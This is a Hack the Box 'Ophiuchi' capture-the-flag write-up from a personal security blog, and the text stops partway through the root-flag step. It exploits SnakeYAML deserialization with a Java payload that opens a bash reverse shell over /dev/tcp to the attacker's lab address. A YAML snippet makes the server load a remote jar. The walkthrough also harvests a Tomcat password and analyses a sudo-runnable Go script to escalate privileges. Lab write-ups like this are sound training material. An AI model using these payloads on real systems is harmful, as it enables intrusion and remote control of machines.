<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
    










    







<script defer language="javascript" type="text/javascript" src="/js/bundle.min.d451ff92e80abc2a828eb9bb262e4db374bd4e954642f9245c54eec84bf690f3.js"></script>






    
    <meta http-equiv="content-type" content="text/html; charset=utf-8">

    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    
    <link rel="icon" href=/images/favicon.ico>

    
    





  





  
  
  


<!-- Open Graph image and Twitter Card metadata -->

<title itemprop="name">Ryan Kozak - Hack the Box Ophiuchi Writeup</title>
<meta property="og:title" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Ophiuchi&#32;Writeup />
<meta name="twitter:title" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Ophiuchi&#32;Writeup />
<meta itemprop="name" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Ophiuchi&#32;Writeup />
<meta name="application-name" content=Ryan&#32;Kozak&#32;-&#32;Hack&#32;the&#32;Box&#32;Ophiuchi&#32;Writeup />
<meta property="og:site_name" content="" />


<meta name="description" content=Hack&#32;the&#32;Box&#32;Ophiuchi&#32;walkthrough:&#32;YAML&#32;deserialization&#32;vulnerability,&#32;JWT&#32;token&#32;manipulation,&#32;and&#32;privilege&#32;escalation&#32;via&#32;sudo. />



<base href="/posts/hack-the-box-ophiuchi-writeup/" />
<link rel="canonical" href="/posts/hack-the-box-ophiuchi-writeup/" itemprop="url" />
<meta name="url" content="/posts/hack-the-box-ophiuchi-writeup/" />
<meta name="twitter:url" content="/posts/hack-the-box-ophiuchi-writeup/" />
<meta property="og:url" content="/posts/hack-the-box-ophiuchi-writeup/" />


<meta property="og:updated_time" content="2021-07-16T16:37:47-07:00" />


<link rel="sitemap" type="application/xml" title="Sitemap" href='/sitemap.xml' />

<meta name="robots" content="index,follow" />
<meta name="googlebot" content="index,follow" />



<meta property="fb:admins" content="" />


<meta name="apple-mobile-web-app-title" content="" />
<meta name="apple-mobile-web-app-capable" content="yes" />
<meta name="apple-mobile-web-app-status-bar-style" content="black" />






<meta name="generator" content="Hugo 0.152.2">


    
    

<link type="text/css" rel="stylesheet" href="/css/bundle.min.2079d7b1d4c2ab5bcf5b79f133cf9778b6f5d2c4b6169ee745a2267ed4a29706.css">


    
    <style>
    body {
        --sidebar-bg-color: #202020;
        --sidebar-img-border-color: #515151;
        --sidebar-p-color: #909090;
        --sidebar-h1-color: #FFF;
        --sidebar-a-color: #FFF;
        --sidebar-socials-color: #FFF;
        --text-color: #222;
        --bkg-color: #FAF9F6;
        --post-title-color: #303030;
        --list-color: #5A5A5A;
        --link-color: #268BD2;
        --date-color: #515151;
        --table-border-color: #E5E5E5;
        --table-stripe-color: #F9F9F9;
        --code-color: #000;
        --code-background-color: #E5E5E5;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
        --moon-sun-color: #FFF;
        --moon-sun-background-color: #515151;
    }
    body.dark-theme {
        --text-color: #EEE;
        --bkg-color: #121212;
        --post-title-color: #DBE2E9;
        --list-color: #9D9D9D;
        --link-color: #268BD2;
        --date-color: #9A9A9A;
        --table-border-color: #515151;
        --table-stripe-color: #202020;
        --code-color: #FFF;
        --code-background-color: #515151;
        --code-block-color: #FFF;
        --code-block-background-color: #272822;
    }
    body {
        background-color: var(--bkg-color);
    }
</style>

    
<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type":  "Person",
  "@id":    "https://ryankozak.com/#ryan-kozak",
  "name":   "Ryan Kozak",
  "jobTitle": "Offensive Security Engineer - Security Researcher",
  "url":    "https://ryankozak.com",
  "image":  "https://ryankozak.com/images/ryan-kozak.jpg",
  "description": "Known hacker, cybersecurity researcher, former OWASP Sacramento Chapter lead, credited with multiple CVEs.",
  "sameAs": [
      "https://github.com/d0n601",
      "https://www.linkedin.com/in/ryan-kozak\/",
      "https://patchstack.com/database/researcher/ryan-kozak",
      "https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ed9aaed9-ca13-413a-a5e3-af97095a4252",
      "https://stackoverflow.com/users/4681506/ryan-kozak"
  ],
  "knowsAbout": ["Hacking", "Red Teaming", "Offensive Security", "Penetration Testing", "Programming"]
}
</script> 
    <script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "WebSite",
  "@id": "https://ryankozak.com/#website",
  "url": "https://ryankozak.com/",
  "name": "RyanKozak.com",
  "publisher": { "@id": "https://ryankozak.com/#ryan-kozak" },
}
</script>
    
    </head>

    <body class="">
        <div class="wrapper">
            <aside class="sidebar">
    <div class="container sidebar-sticky">
        <div class="light-dark" align="right">
    <button class="btn-light-dark" title="Toggle light/dark mode">
        <svg class="moon" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M6 .278a.768.768 0 0 1 .08.858a7.208 7.208 0 0 0-.878 3.46c0 4.021 3.278 7.277 7.318 7.277c.527 0 1.04-.055 1.533-.16a.787.787 0 0 1 .81.316a.733.733 0 0 1-.031.893A8.349 8.349 0 0 1 8.344 16C3.734 16 0 12.286 0 7.71C0 4.266 2.114 1.312 5.124.06A.752.752 0 0 1 6 .278z"/>
        </svg>
        <svg class="sun" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" viewBox="0 0 16 16">
            <path fill="currentColor" d="M8 12a4 4 0 1 0 0-8a4 4 0 0 0 0 8zM8 0a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 0zm0 13a.5.5 0 0 1 .5.5v2a.5.5 0 0 1-1 0v-2A.5.5 0 0 1 8 13zm8-5a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2a.5.5 0 0 1 .5.5zM3 8a.5.5 0 0 1-.5.5h-2a.5.5 0 0 1 0-1h2A.5.5 0 0 1 3 8zm10.657-5.657a.5.5 0 0 1 0 .707l-1.414 1.415a.5.5 0 1 1-.707-.708l1.414-1.414a.5.5 0 0 1 .707 0zm-9.193 9.193a.5.5 0 0 1 0 .707L3.05 13.657a.5.5 0 0 1-.707-.707l1.414-1.414a.5.5 0 0 1 .707 0zm9.193 2.121a.5.5 0 0 1-.707 0l-1.414-1.414a.5.5 0 0 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .707zM4.464 4.465a.5.5 0 0 1-.707 0L2.343 3.05a.5.5 0 1 1 .707-.707l1.414 1.414a.5.5 0 0 1 0 .708z"/>
        </svg>
    </button>
</div>

        <div class="sidebar-about">
    <h1 class="brand">
        
            <a href="/">
                <img src="/images/d0n601.jpg" alt="brand image">
            </a>
        
        
            <a href="/">
                <h1>Ryan Kozak</h1>
            </a>
        
    </h1>
    <p class="lead">
    Hacking, CVEs, Development, and Other Things.
    </p>
</div>

        <nav>
    <ul class="sidebar-nav">

        
        
        
        
            

            
                
                
                    <li class="heading">
                        <a href="/about">About Me</a>
                    </li>
                    
                
            
                
                
            
            
                
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        
        
            

            
                
                
            
                
                
                    <li class="heading">
                        <a href="/posts/">Recent</a>
                    </li>
                    
                        <li class="sub-heading">
                            
                        </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-12973/">S2B AI Assistant – ChatBot, ChatGPT, OpenAI, Content &amp; Image Generator &lt;= 1.7.8 - Authenticated (Editor&#43;) Arbitrary File Upload</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-12399/">Alex Reservations: Smart Restaurant Booking &lt;= 2.2.3 - Authenticated (Admin&#43;) Arbitrary File Upload</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-9216/">StoreEngine – Powerful WordPress eCommerce Plugin for Payments, Memberships, Affiliates, Sales &amp; More &lt;= 1.4.0 - Authenticated (Subscriber&#43;) Arbitrary File Upload</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-9215/">StoreEngine Powerful WordPress eCommerce Plugin for Payments, Memberships, Affiliates, Sales &amp; More &lt;= 1.4.0 - Authenticated (Subscriber&#43;) Arbitrary File Download</a>
                            </li>
                        
                            <li class="bullet">
                                <a href="/posts/cve-2025-6085/">Make Connector &lt;= 1.5.10 - Authenticated (Admin&#43;) Arbitrary File Upload</a>
                            </li>
                        
                    
                
            
            
                
                
            
                
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
                        
                
            
        

    </ul>
</nav>

        
    <a target="_blank" class="social" title="GitHub" href="https://github.com/d0n601">
        <svg xmlns="http://www.w3.org/2000/svg" width="1.2em" height="1.2em" viewBox="-2 -2 24 24">
            <path fill="currentColor" d="M18.88 1.099C18.147.366 17.265 0 16.233 0H3.746C2.714 0 1.832.366 1.099 1.099C.366 1.832 0 2.714 0 3.746v12.487c0 1.032.366 1.914 1.099 2.647c.733.733 1.615 1.099 2.647 1.099H6.66c.19 0 .333-.007.429-.02a.504.504 0 0 0 .286-.169c.095-.1.143-.245.143-.435l-.007-.885c-.004-.564-.006-1.01-.006-1.34l-.3.052c-.19.035-.43.05-.721.046a5.555 5.555 0 0 1-.904-.091a2.026 2.026 0 0 1-.872-.39a1.651 1.651 0 0 1-.572-.8l-.13-.3a3.25 3.25 0 0 0-.41-.663c-.186-.243-.375-.407-.566-.494l-.09-.065a.956.956 0 0 1-.17-.156a.723.723 0 0 1-.117-.182c-.026-.061-.004-.111.065-.15c.07-.04.195-.059.378-.059l.26.04c.173.034.388.138.643.311a2.1 2.1 0 0 1 .631.677c.2.355.44.626.722.813c.282.186.566.28.852.28c.286 0 .533-.022.742-.065a2.59 2.59 0 0 0 .585-.196c.078-.58.29-1.028.637-1.34a8.907 8.907 0 0 1-1.333-.234a5.314 5.314 0 0 1-1.223-.507a3.5 3.5 0 0 1-1.047-.872c-.277-.347-.505-.802-.683-1.365c-.177-.564-.266-1.215-.266-1.952c0-1.049.342-1.942 1.027-2.68c-.32-.788-.29-1.673.091-2.652c.252-.079.625-.02 1.119.175c.494.195.856.362 1.086.5c.23.14.414.257.553.352a9.233 9.233 0 0 1 2.497-.338c.859 0 1.691.113 2.498.338l.494-.312a6.997 6.997 0 0 1 1.197-.572c.46-.174.81-.221 1.054-.143c.39.98.424 1.864.103 2.653c.685.737 1.028 1.63 1.028 2.68c0 .737-.089 1.39-.267 1.957c-.177.568-.407 1.023-.689 1.366a3.65 3.65 0 0 1-1.053.865c-.42.234-.828.403-1.223.507a8.9 8.9 0 0 1-1.333.235c.45.39.676 1.005.676 1.846v3.11c0 .147.021.266.065.357a.36.36 0 0 0 .208.189c.096.034.18.056.254.064c.074.01.18.013.318.013h2.914c1.032 0 1.914-.366 2.647-1.099c.732-.732 1.099-1.615 1.099-2.647V3.746c0-1.032-.367-1.914-1.1-2.647z"/>
        </svg>
    </a>



    <a target="_blank" class="social" title="LinkedIn" href="https://www.linkedin.com/in/ryan-kozak/">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 448 512">
            <path fill="currentColor" d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5c0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7c-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5c67.2 0 79.7 44.3 79.7 101.9V416z"/>
        </svg>
    </a>















    <a target="_blank" class="social" title="RSS Feed" href="/posts/index.xml">
        <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 1280.000000 1280.000000">
            <g transform="translate(0.000000,1280.000000) scale(0.100000,-0.100000)" fill="currentColor">
                <path d="M2295 11929 c-284 -12 -642 -45 -707 -65 -17 -5 -18 -63 -18 -1039 0 -569 4 -1036 8 -1039 5 -3 74 6 153 19 510 86 1168 95 1789 25 1348 -153 2602 -677 3670 -1531 385 -308 820 -744 1126 -1129 842 -1060 1362 -2313 1514 -3650 70 -621 61 -1279 -25 -1789 -13 -79 -22 -148 -19 -153 3 -4 471 -8 1039 -8 l1035 0 5 23 c51 225 85 942 67 1419 -23 605 -77 1044 -198 1617 -294 1400 -927 2734 -1823 3846 -1043 1295 -2364 2259 -3909 2854 -1158 447 -2451 656 -3707 600z"/>
                <path d="M2255 7845 c-269 -25 -620 -81 -667 -106 -17 -9 -18 -55 -18 -899 0 -706 3 -890 13 -890 6 0 66 18 132 41 130 44 288 79 467 105 154 21 577 30 749 15 1207 -107 2267 -823 2814 -1902 166 -327 268 -637 330 -1001 38 -227 48 -384 42 -662 -8 -348 -44 -590 -126 -831 -23 -66 -41 -126 -41 -132 0 -10 184 -13 890 -13 844 0 890 1 899 18 27 50 88 452 110 725 14 162 14 624 1 782 -59 703 -233 1323 -545 1945 -481 956 -1313 1788 -2270 2268 -620 310 -1239 483 -1940 542 -165 14 -669 10 -840 -5z"/>
                <path d="M2519 3815 c-391 -66 -725 -336 -868 -703 -79 -201 -96 -462 -45 -677 83 -344 338 -641 666 -774 116 -47 205 -69 330 -80 412 -39 811 153 1040 500 193 292 240 648 128 981 -135 403 -492 699 -914 757 -100 14 -241 12 -337 -4z"/>
            </g>
        </svg>
    </a>


    <a target="_blank" class="social" title="Email" href="mailto:website@ryankozak.com">
       <svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1.2em" viewBox="0 0 485.211 485.211">
            <path fill="currentColor" d="M301.393,241.631L464.866,424.56H20.332l163.474-182.928l58.801,51.443L301.393,241.631z M462.174,60.651H23.027 l219.579,192.142L462.174,60.651z M324.225,221.67l160.986,180.151V80.792L324.225,221.67z M0,80.792v321.029L160.972,221.64 L0,80.792z"/>
       </svg>
    </a>




        <p class="footnote">
    &copy; 2025 . All rights reserved.
</p>

  </div>
</aside>

            <main class="content container">
                <script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type": "TechArticle",
  "@id": "\/posts\/hack-the-box-ophiuchi-writeup\/#article",
  "headline": "\"Hack the Box Ophiuchi Writeup\"",
  "author": { "@id": "" },
  "datePublished": "2021-07-16",
  "dateModified": "2021-07-16",
  "inLanguage": "en",
  "mainEntityOfPage": { "@type": "WebPage", "@id": "\/posts\/hack-the-box-ophiuchi-writeup\/" }
}
</script>


<script type="application/ld+json">
{
  "@context": "https://schema.org",
  "@type":    "TechArticle",
  "headline": "\"Hack the Box Ophiuchi Writeup\"",
  "datePublished": "2021-07-16",
  "dateModified":  "2021-07-16",
  "author":   { "@id": "\/#ryan-kozak" },
  "publisher": {
    "@type": "Organization",
    "name":  "Ryan Kozak",
    "logo": {
      "@type": "ImageObject",
      "url": "\/images\/d0n601.png"
    }
  },
  "image": "null",
  "mainEntityOfPage": {
    "@type": "WebPage",
    "@id": "\/posts\/hack-the-box-ophiuchi-writeup\/"
  }
}
</script>
<div class="post">
  <div class="info">
  <h1 class="post-title">
    <a href="/posts/hack-the-box-ophiuchi-writeup/">Hack the Box Ophiuchi Writeup</a>
  </h1>

  <div class="headline">
    <div>
      
      
      <time datetime=" 2021-07-16T16:37:47-0700" class="post-date">
        July 16, 2021
      </time>
      
      <span> - </span>
      <span class="reading-time">
        
          
        

        <span>6 mins read</span>
      </span>
    </div>

    
  </div>

  
  

  
</div>

  <p><img src="/posts/images/hack-the-box-ophiuchi-writeup/badge.png" alt="badge"></p>
<h1 id="introduction">Introduction</h1>
<p>Ophiuchi is a Medium box with a weird name to pronounce. The initial foothold was straight forward but fun, the user flag reminds us to go back to the basics, and the root flag is a difficult mind game for those of us that haven&rsquo;t even been exposed to the technology.</p>
<h1 id="information-gathering">Information Gathering</h1>
<h2 id="port-scan-nmapautomator">Port Scan: nmapAutomator</h2>
<p>We begin our reconnaissance by running <em><a href="https://github.com/21y4d/nmapAutomator" target="_blank">nmapAutomator</a></em> via <code>sudo ./nmapAutomator.sh 10.10.10.227 All</code>. Among many other things, this runs our port scans with increasing comprehensiveness.</p>
<p>Output of Basic nmap scan below.</p>
<pre tabindex="0"><code>┌──(kali㉿kali)-[~/Tools/nmapAutomator/10.10.10.227/nmap]
└─$ cat Basic_10.10.10.227.nmap
# Nmap 7.91 scan initiated Fri Jun 11 19:18:21 2021 as: nmap -Pn -sCV -p22,8080 -oN nmap/Basic_10.10.10.227.nmap --dns-server=1.1.1.1 10.10.10.227
Nmap scan report for 10.10.10.227
Host is up (0.34s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
|   256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_  256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.38
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 11 19:18:49 2021 -- 1 IP address (1 host up) scanned in 27.15 seconds
</code></pre><p>The open ports on the machine are <strong>22</strong> and <strong>8080</strong>. These are all we&rsquo;ll need to proceed through the rest of the box. Let&rsquo;s take a look at what&rsquo;s on the web port.</p>
<h3 id="port-8080">Port 8080</h3>
<p>Browsing to the website we can see that it&rsquo;s a web application for parsing YAML.<br>
<img src="/posts/images/hack-the-box-ophiuchi-writeup/parser.png" alt="yaml_webapp"><br>
<strong>Figure 1:</strong> Online YAML parser</p>
<p>A quick search for &ldquo;YAML parser vulnerability&rdquo; leads us to &ldquo;Snake YAML Deserilization&rdquo; <em><a href="https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858" target="_blank">1</a></em>.</p>
<p><img src="/posts/images/hack-the-box-ophiuchi-writeup/yaml_google.png" alt="yaml_google"><br>
<strong>Figure 2:</strong> Snake YAML Deserilization Exploit.</p>
<h1 id="exploitation">Exploitation</h1>
<h2 id="initial-foothold">Initial foothold</h2>
<p>The SnakeYAML deserilization attack is made easier with artsploit&rsquo;s <em><a href="https://github.com/artsploit/yaml-payload" target="_blank">yaml-payload Github repository</a></em> and an additional payload for a reverse shell can be found in <em><a href="https://github.com/artsploit/yaml-payload/issues/3" target="_blank">issue 3</a></em>.</p>
<p>First, we&rsquo;ll clone the repository <code>git clone https://github.com/artsploit/yaml-payload.git</code>.<br>
<img src="/posts/images/hack-the-box-ophiuchi-writeup/clone.png" alt="clone_repo">
<strong>Figure 3:</strong> Clone yaml-payload repo.</p>
<p>We then navigate to <code>yaml-payload/src/artsploit</code> and modify the <code>AwesomeScriptEngineFactory()</code> method within <code>AwesomeScriptEngineFactory.java</code>. The default payload pops open the calculator application on MacOS. The payloads that are posted in <em><a href="https://github.com/artsploit/yaml-payload/issues/3" target="_blank">issue 3</a></em> of this repo will call a reverse shell, so rather than recreating them, we&rsquo;ll drop the first payload into <code>AwesomeScriptEngineFactory.java</code> with our IP address as the callback.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span><span style="color:#66d9ef">public</span> <span style="color:#a6e22e">AwesomeScriptEngineFactory</span>() {
</span></span><span style="display:flex;"><span>    String <span style="color:#f92672">[]</span> cmd<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#34;bash&#34;</span>,<span style="color:#e6db74">&#34;-c&#34;</span>,<span style="color:#e6db74">&#34;bash -i &gt;&amp; /dev/tcp/10.10.14.3/8081 0&gt;&amp;1&#34;</span>};
</span></span><span style="display:flex;"><span>    String <span style="color:#f92672">[]</span> jex<span style="color:#f92672">=</span>{<span style="color:#e6db74">&#34;bash&#34;</span>,<span style="color:#e6db74">&#34;-c&#34;</span>,<span style="color:#e6db74">&#34;{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}&#34;</span>};
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">try</span> {
</span></span><span style="display:flex;"><span>        Runtime.<span style="color:#a6e22e">getRuntime</span>().<span style="color:#a6e22e">exec</span>(cmd);
</span></span><span style="display:flex;"><span>        Runtime.<span style="color:#a6e22e">getRuntime</span>().<span style="color:#a6e22e">exec</span>(jex);
</span></span><span style="display:flex;"><span>        Runtime.<span style="color:#a6e22e">getRuntime</span>().<span style="color:#a6e22e">exec</span>(<span style="color:#e6db74">&#34;echo $jex&#34;</span>);
</span></span><span style="display:flex;"><span>    } <span style="color:#66d9ef">catch</span> (IOException e) {
</span></span><span style="display:flex;"><span>        e.<span style="color:#a6e22e">printStackTrace</span>();
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p><img src="/posts/images/hack-the-box-ophiuchi-writeup/awesome_jar.png" alt="awesome_jar">
<strong>Figure 4:</strong> Placing reverse shell payload into <code>AwesomeScriptEngineFactory.java</code>&rsquo;s <code>AwesomeScriptEngineFactory()</code> method.</p>
<p>Now, as instructed by the repository, we&rsquo;ll compile the <code>AwesomeScriptEngineFactory.java</code> file and build our <code>yaml-payload.jar</code> file.</p>
<p><img src="/posts/images/hack-the-box-ophiuchi-writeup/build.png" alt="build"><br>
<strong>Figure 5:</strong> Compiling Java exploit and building <code>yaml-payload.jar</code>.</p>
<p>Since the snippet we&rsquo;ll be placing into the web application will pull <code>yaml-payload.jar</code> from a remote url, we&rsquo;ll copy the payload to our apache directory and make sure the server is running.</p>
<p><img src="/posts/images/hack-the-box-ophiuchi-writeup/copy_server.png" alt="copy_server"><br>
<strong>Figure 6:</strong> Copy <code>yaml-payload.jar</code> to Apache&rsquo;s directory and start the server.</p>
<p>By placing the snippet below into the YAML parser, we&rsquo;ll download the payload we&rsquo;ve just created and hosted, and execute it  on the victim machine (we must first not forget to start our netcat listener on port 8081)</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span><span style="color:#f92672">!!</span>javax.<span style="color:#a6e22e">script</span>.<span style="color:#a6e22e">ScriptEngineManager</span> <span style="color:#f92672">[</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">!!</span>java.<span style="color:#a6e22e">net</span>.<span style="color:#a6e22e">URLClassLoader</span> <span style="color:#f92672">[[</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">!!</span>java.<span style="color:#a6e22e">net</span>.<span style="color:#a6e22e">URL</span> <span style="color:#f92672">[</span><span style="color:#e6db74">&#34;http://10.10.14.3/yaml-payload.jar&#34;</span><span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">]]</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">]</span>
</span></span></code></pre></div><p><img src="/posts/images/hack-the-box-ophiuchi-writeup/execute_foothold.png" alt="execute_foothold"><br>
<strong>Figure 7:</strong> Snippet placed in web application.</p>
<p>Once we click &ldquo;parse&rdquo; the payload is executed and our shell is obtained.</p>
<p><img src="/posts/images/hack-the-box-ophiuchi-writeup/foothold.png" alt="foothold"><br>
<strong>Figure 8:</strong> Reverse shell as tomcat user.</p>
<h2 id="user-flag">User Flag</h2>
<p>Moving from the initial foothold to the user flag on this machine is fairly simple. After some manual enumeration we&rsquo;ll find that <code>/opt/tomcat/conf/tomcat-users.xml</code> contains a password <code>whereisalimit</code> for the <code>admin</code> user.</p>
<p><img src="/posts/images/hack-the-box-ophiuchi-writeup/users_xml.png" alt="users_xml"><br>
<strong>Figure 9:</strong> The <code>tomcat-users.xml</code> file containing credentials for <code>admin</code> user.</p>
<p>To login as the <code>admin</code> user, we&rsquo;ll first use the old <code>python3 -c 'import pty; pty.spawn(&quot;/bin/bash&quot;)'</code> trick to get an interactive shell, and then simply <code>su</code> with the credentials we&rsquo;ve found.<br>
<img src="/posts/images/hack-the-box-ophiuchi-writeup/user.png" alt="users"><br>
<strong>Figure 10:</strong> The flag for the <code>admin</code> user.</p>
<h2 id="root-flag">Root Flag</h2>
<p>Running <em><a href="https://github.com/diego-treitos/linux-smart-enumeration" target="_blank">lse.sh</a></em> reveals that we&rsquo;re able to execute <code>/opt/wasm-functions/index.go</code> via sudo without a password.</p>
<pre tabindex="0"><code>[!] sud010 Can we list sudo commands without a password?................... yes!
---
Matching Defaults entries for admin on ophiuchi:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
    (ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go
---
</code></pre><p>When we examine the <code>/opt/wasm-functions/index.go</code> file, we can see that it reads <code>main.wasm</code> without a path, and calls <code>deploy.sh</code> without a path. If a variable <code>f</code> is set equal to <code>1</code>.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-go" data-lang="go"><span style="display:flex;"><span><span style="color:#f92672">package</span> <span style="color:#a6e22e">main</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> (
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;fmt&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">wasm</span> <span style="color:#e6db74">&#34;github.com/wasmerio/wasmer-go/wasmer&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;os/exec&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;log&#34;</span>
</span></span><span style="display:flex;"><span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">func</span> <span style="color:#a6e22e">main</span>() {
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">bytes</span>, <span style="color:#a6e22e">_</span> <span style="color:#f92672">:=</span> <span style="color:#a6e22e">wasm</span>.<span style="color:#a6e22e">ReadBytes</span>(<span style="color:#e6db74">&#34;main.wasm&#34;</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">instance</span>, <span style="color:#a6e22e">_</span> <span style="color:#f92672">:=</span> <span style="color:#a6e22e">wasm</span>.<span style="color:#a6e22e">NewInstance</span>(<span style="color:#a6e22e">bytes</span>)
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">defer</span> <span style="color:#a6e22e">instance</span>.<span style="color:#a6e22e">Close</span>()
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">init</span> <span style="color:#f92672">:=</span> <span style="color:#a6e22e">instance</span>.<span style="color:#a6e22e">Exports</span>[<span style="color:#e6db74">&#34;info&#34;</span>]
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">result</span>,<span style="color:#a6e22e">_</span> <span style="color:#f92672">:=</span> <span style="color:#a6e22e">init</span>()
</span></span><span style="display:flex;"><span>        <span style="color:#a6e22e">f</span> <span style="color:#f92672">:=</span> <span style="color:#a6e22e">result</span>.<span style="color:#a6e22e">String</span>()
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">f</span> <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#34;1&#34;</span>) {
</span></span><span style="display:flex;"><span>                <span style="color:#a6e22e">fmt</span>.<span style="color:#a6e22e">Println</span>(<span style="color:#e6db74">&#34;Not ready to deploy&#34;</span>)
</span></span><span style="display:flex;"><span>        } <span style="color:#66d9ef">else</span> {
</span></span><span style="display:flex;"><span>                <span style="color:#a6e22e">fmt</span>.<span style="color:#a6e22e">Println</span>(<span style="color:#e6db74">&#34;Ready to deploy&#34;</span>)
</span></span><span style="display:flex;"><span>                <span style="color:#a6e22e">out</span>, <span style="color:#a6e22e">err</span> <span style="color:#f92672">:=</span> <span style="color:#a6e22e">exec</span>.<span style="color:#a6e22e">Command</span>(<span style="color:#e6db74">&#34;/bin/sh&#34;</span>, <span style="color:#e6db74">&#34;deploy.sh&#34;</span>).<span style="color:#a6e22e">Output</span>()
</span></span><span style="display:flex;"><span>                <span style="color:#66d9ef">if</span> <span style="color:#a6e22e">err</span> <span style="color:#f92672">!=</span> <span style="color:#66d9ef">nil</span> {
</span></span><span style="display:flex;"><span>                        <span style="color:#a6e22e">log</span>.<span style="color:#a6e22e">Fatal</span>(<span style="color:#a6e22e">err</span>)
</span></span><span style="display:flex;"><span>                }
</span></span><span style="display:flex;"><span>                <span style="color:#a6e22e">fmt</span>.<span style="color:#a6e22e">Println</span>(string(<span style="color:#a6e22e">out</span>))
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>If we&rsquo;re able to control this <code>f</code> variable, then we can create our own <code>deploy.sh</code> script to be executed in another directory (presumable to gain us a reverse shell as root).</p>
<p>To decompile <code>main.wasm</code> into a human readable <code>.wat</code> file, we can use the following <em><a href="https://github.com/WebAssembly/wabt.git" target="_blank">https://github.com/WebAssembly/wabt.git</a></em>.</p>
<pre tabindex="0"><code>┌──(kali㉿kali)-[~/Tools]
